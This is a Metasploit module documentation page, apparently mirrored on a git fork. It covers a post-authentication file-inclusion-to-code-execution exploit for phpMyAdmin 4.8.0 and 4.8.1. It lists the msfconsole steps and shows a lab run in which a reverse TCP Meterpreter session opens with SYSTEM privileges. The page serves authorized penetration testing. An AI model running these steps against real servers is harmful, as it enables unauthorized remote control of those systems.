dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md

1.2 KiB
Raw Permalink Blame History

Description

phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1.

Vulnerable Application

phpMyAdmin v4.8.1 and v4.8.0

Verification Steps

  1. ./msfconsole -q
  2. use exploit/multi/http/phpmyadmin_lfi_rce
  3. set rhosts <rhost>
  4. run

Scenarios

Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1

msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122
rhosts => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run

[*] Started reverse TCP handler on 172.22.222.190:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Meterpreter session 1 opened (172.22.222.190:4444 -> 172.22.222.122:51999) at 2018-07-05 13:14:39 -0500

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    :
OS          : Windows NT 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >